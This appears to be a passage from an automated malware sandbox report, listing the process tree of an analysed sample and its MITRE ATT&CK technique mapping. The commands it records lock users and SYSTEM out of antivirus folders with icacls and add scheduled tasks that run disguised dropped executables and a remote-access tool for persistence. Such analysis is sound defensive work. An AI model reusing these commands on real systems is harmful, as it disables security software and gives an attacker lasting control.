  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5644
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5888
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:5860
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
  2⤵
  - Creates scheduled task(s)
  PID:5380
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Creates scheduled task(s)
  PID:5700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s AppMgmt
1⤵
PID:4784

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4552
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4564
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:5812
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:5036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

Query Registry

T1012

System Information Discovery